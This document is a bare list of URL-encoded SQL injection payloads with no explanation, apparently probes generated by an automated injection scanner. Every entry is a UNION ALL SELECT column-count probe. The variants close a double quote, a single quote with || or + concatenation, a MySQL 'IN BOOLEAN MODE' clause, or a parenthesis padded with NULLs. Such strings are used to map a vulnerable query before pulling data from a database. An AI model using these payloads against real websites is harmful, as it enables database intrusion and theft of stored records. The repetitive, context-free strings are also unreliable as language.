-4518%22%20WHERE%208301%3D8301%20UNION%20ALL%20SELECT%208301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%2C8301%23 -3630%22%20WHERE%207424%3D7424%20UNION%20ALL%20SELECT%207424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%23 -5299%22%20WHERE%208974%3D8974%20UNION%20ALL%20SELECT%208974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%2C8974%23 -9800%22%20WHERE%204886%3D4886%20UNION%20ALL%20SELECT%204886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%2C4886%23 -6136%22%20WHERE%201622%3D1622%20UNION%20ALL%20SELECT%201622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%2C1622%23 -8185%20WHERE%201519%3D1519%20UNION%20ALL%20SELECT%201519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%23 -2578%20WHERE%205264%3D5264%20UNION%20ALL%20SELECT%205264%2C5264%2C5264%2C5264%2C5264%2C5264%2C5264%2C5264%2C5264%2C5264%2C5264%2C5264%2C5264%2C5264%2C5264%2C5264%2C5264%2C5264%2C5264%2C5264%2C5264%2C5264%23 -8101%20WHERE%204884%3D4884%20UNION%20ALL%20SELECT%204884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%23 -1578%20WHERE%203418%3D3418%20UNION%20ALL%20SELECT%203418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%23 -1150%20WHERE%201144%3D1144%20UNION%20ALL%20SELECT%201144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%2C1144%23 -5296%20WHERE%208445%3D8445%20UNION%20ALL%20SELECT%208445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%2C8445%23 -3309%20WHERE%204452%3D4452%20UNION%20ALL%20SELECT%204452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%23 -7309%20WHERE%207917%3D7917%20UNION%20ALL%20SELECT%207917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%23 -6632%20WHERE%205709%3D5709%20UNION%20ALL%20SELECT%205709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%2C5709%23 -8490%20WHERE%207297%3D7297%20UNION%20ALL%20SELECT%207297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%23 -6921%27%7C%7C%28SELECT%20%27VUEy%27%20FROM%20DUAL%20WHERE%205610%3D5610%20UNION%20ALL%20SELECT%205610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%23 -8017%27%7C%7C%28SELECT%20%27fFmb%27%20FROM%20DUAL%20WHERE%204935%3D4935%20UNION%20ALL%20SELECT%204935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%23 -9887%27%7C%7C%28SELECT%20%27wrLF%27%20FROM%20DUAL%20WHERE%209144%3D9144%20UNION%20ALL%20SELECT%209144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%23 -6621%27%7C%7C%28SELECT%20%27Lrsd%27%20FROM%20DUAL%20WHERE%207709%3D7709%20UNION%20ALL%20SELECT%207709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%23 -1644%27%7C%7C%28SELECT%20%27qTEI%27%20FROM%20DUAL%20WHERE%207419%3D7419%20UNION%20ALL%20SELECT%207419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%2C7419%23 -8545%27%7C%7C%28SELECT%20%27csxx%27%20FROM%20DUAL%20WHERE%208973%3D8973%20UNION%20ALL%20SELECT%208973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%2C8973%23 -2076%27%7C%7C%28SELECT%20%27KhQW%27%20FROM%20DUAL%20WHERE%202630%3D2630%20UNION%20ALL%20SELECT%202630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%23 -1764%27%7C%7C%28SELECT%20%27DnTf%27%20FROM%20DUAL%20WHERE%201883%3D1883%20UNION%20ALL%20SELECT%201883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%2C1883%23 -6470%27%7C%7C%28SELECT%20%27eNWf%27%20FROM%20DUAL%20WHERE%207646%3D7646%20UNION%20ALL%20SELECT%207646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%2C7646%23 -2725%27%7C%7C%28SELECT%20%27BgHM%27%20FROM%20DUAL%20WHERE%208428%3D8428%20UNION%20ALL%20SELECT%208428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%2C8428%23 -4967%27%7C%7C%28SELECT%20%27htdT%27%20WHERE%206064%3D6064%20UNION%20ALL%20SELECT%206064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%23 -3983%27%7C%7C%28SELECT%20%27YHXl%27%20WHERE%202249%3D2249%20UNION%20ALL%20SELECT%202249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%2C2249%23 -8189%27%7C%7C%28SELECT%20%27HEBN%27%20WHERE%201844%3D1844%20UNION%20ALL%20SELECT%201844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%23 -2750%27%7C%7C%28SELECT%20%27FmXA%27%20WHERE%204436%3D4436%20UNION%20ALL%20SELECT%204436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%2C4436%23 -2182%27%7C%7C%28SELECT%20%27WVEe%27%20WHERE%208162%3D8162%20UNION%20ALL%20SELECT%208162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%23 -3574%27%7C%7C%28SELECT%20%27Ogoq%27%20WHERE%205999%3D5999%20UNION%20ALL%20SELECT%205999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%23 -1565%27%7C%7C%28SELECT%20%27KEPB%27%20WHERE%207614%3D7614%20UNION%20ALL%20SELECT%207614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%2C7614%23 -3526%27%7C%7C%28SELECT%20%27EhHG%27%20WHERE%202746%3D2746%20UNION%20ALL%20SELECT%202746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%23 -1816%27%7C%7C%28SELECT%20%27CxdT%27%20WHERE%204412%3D4412%20UNION%20ALL%20SELECT%204412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%2C4412%23 -8773%27%7C%7C%28SELECT%20%27braL%27%20WHERE%203780%3D3780%20UNION%20ALL%20SELECT%203780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%23 -6671%27%2B%28SELECT%20ukoB%20WHERE%204579%3D4579%20UNION%20ALL%20SELECT%204579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%23 -3070%27%2B%28SELECT%20MmGB%20WHERE%206273%3D6273%20UNION%20ALL%20SELECT%206273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%23 -6099%27%2B%28SELECT%20kzXN%20WHERE%209837%3D9837%20UNION%20ALL%20SELECT%209837%2C9837%2C9837%2C9837%2C9837%2C9837%2C9837%2C9837%2C9837%2C9837%2C9837%2C9837%2C9837%2C9837%2C9837%2C9837%2C9837%2C9837%2C9837%2C9837%2C9837%2C9837%2C9837%23 -9015%27%2B%28SELECT%20CUMp%20WHERE%209763%3D9763%20UNION%20ALL%20SELECT%209763%2C9763%2C9763%2C9763%2C9763%2C9763%2C9763%2C9763%2C9763%2C9763%2C9763%2C9763%2C9763%2C9763%2C9763%2C9763%2C9763%2C9763%2C9763%2C9763%2C9763%2C9763%2C9763%2C9763%23 -8546%27%2B%28SELECT%20oEGh%20WHERE%208330%3D8330%20UNION%20ALL%20SELECT%208330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%2C8330%23 -4849%27%2B%28SELECT%20PdgK%20WHERE%204645%3D4645%20UNION%20ALL%20SELECT%204645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%23 -2938%27%2B%28SELECT%20ZaJY%20WHERE%206981%3D6981%20UNION%20ALL%20SELECT%206981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%2C6981%23 -7168%27%2B%28SELECT%20DJSD%20WHERE%209812%3D9812%20UNION%20ALL%20SELECT%209812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%2C9812%23 -4671%27%2B%28SELECT%20ULci%20WHERE%208617%3D8617%20UNION%20ALL%20SELECT%208617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%23 -9143%27%2B%28SELECT%20uKIZ%20WHERE%209148%3D9148%20UNION%20ALL%20SELECT%209148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%23 -1054%27%2B%28SELECT%20%27crSm%27%20WHERE%209849%3D9849%20UNION%20ALL%20SELECT%209849%2C9849%2C9849%2C9849%2C9849%2C9849%2C9849%2C9849%2C9849%2C9849%2C9849%2C9849%2C9849%2C9849%2C9849%2C9849%2C9849%2C9849%2C9849%2C9849%2C9849%23 -8611%27%2B%28SELECT%20%27TUPQ%27%20WHERE%205263%3D5263%20UNION%20ALL%20SELECT%205263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%2C5263%23 -3224%27%2B%28SELECT%20%27NMab%27%20WHERE%203746%3D3746%20UNION%20ALL%20SELECT%203746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%2C3746%23 -8648%27%2B%28SELECT%20%27DYOU%27%20WHERE%207540%3D7540%20UNION%20ALL%20SELECT%207540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%23 -1882%27%2B%28SELECT%20%27Baxi%27%20WHERE%203216%3D3216%20UNION%20ALL%20SELECT%203216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%23 -8708%27%2B%28SELECT%20%27peov%27%20WHERE%207852%3D7852%20UNION%20ALL%20SELECT%207852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%2C7852%23 -2113%27%2B%28SELECT%20%27yano%27%20WHERE%205632%3D5632%20UNION%20ALL%20SELECT%205632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%2C5632%23 -6843%27%2B%28SELECT%20%27xFdQ%27%20WHERE%209583%3D9583%20UNION%20ALL%20SELECT%209583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%2C9583%23 -2509%27%2B%28SELECT%20%27Ppvw%27%20WHERE%209688%3D9688%20UNION%20ALL%20SELECT%209688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%23 -5857%27%2B%28SELECT%20%27Gohw%27%20WHERE%209262%3D9262%20UNION%20ALL%20SELECT%209262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%2C9262%23 -8604%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%23 -7722%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%2C2182%23 -5048%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%2C5828%23 -4959%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207503%2C7503%2C7503%2C7503%2C7503%2C7503%2C7503%2C7503%2C7503%2C7503%2C7503%2C7503%2C7503%2C7503%2C7503%2C7503%2C7503%2C7503%2C7503%2C7503%2C7503%2C7503%2C7503%2C7503%23 -9984%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%23 -2431%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%23 -3290%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%2C7859%23 -9827%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%23 -3678%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%23 -1469%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 